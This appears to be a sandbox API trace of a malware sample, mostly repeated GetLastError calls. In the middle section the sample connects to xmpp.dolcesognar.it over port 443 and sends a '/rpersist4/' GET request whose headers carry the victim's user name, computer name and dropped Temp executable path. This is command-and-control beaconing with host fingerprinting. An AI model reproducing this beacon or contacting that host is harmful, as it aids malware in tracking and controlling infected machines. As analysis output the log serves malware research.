	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.182] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.183] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] GetLastError () returned 0x0
	[0098.184] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f8d8 | out: phkResult=0x205f8d8*=0x248) returned 0x0
	[0098.184] RegQueryValueExW (in: hKey=0x248, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0098.184] RegQueryValueExW (in: hKey=0x248, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x65acc8, lpcbData=0x205f8dc*=0x4 | out: lpType=0x0, lpData=0x65acc8*=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0098.184] RegCloseKey (hKey=0x248) returned 0x0
	[0098.184] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0098.221] InternetConnectA (hInternet=0xcc0004, lpszServerName="xmpp.dolcesognar.it", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.222] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] GetLastError () returned 0x0
	[0098.223] lstrlenA (lpString="/rpersist4/1197631235") returned 21
	[0098.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x6e1f08, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0098.223] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0098.328] wsprintfW (in: param_1=0x66b0b8, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0098.328] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0098.328] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0098.328] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x6a0a20, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0098.329] wsprintfW (in: param_1=0x66b0b8, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0098.329] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0098.329] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0098.329] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x2e4) returned 0x0
	[0098.329] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0098.329] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0098.329] RegQueryValueExW (in: hKey=0x2e4, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0098.329] RegCloseKey (hKey=0x2e4) returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.329] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.330] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.333] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.334] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.335] GetLastError () returned 0x0
	[0098.336] GetLastError () returned 0x0
	[0098.336] GetLastError () returned 0x0
	[0098.336] GetComputerNameW (in: lpBuffer=0x69fb08, nSize=0x205f400 | out: lpBuffer="X2VS1CUM", nSize=0x205f400) returned 1
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.336] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] GetLastError () returned 0xcb
	[0098.337] wsprintfW (in: param_1=0x66b0b8, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0098.337] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0098.337] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0098.337] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.337] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
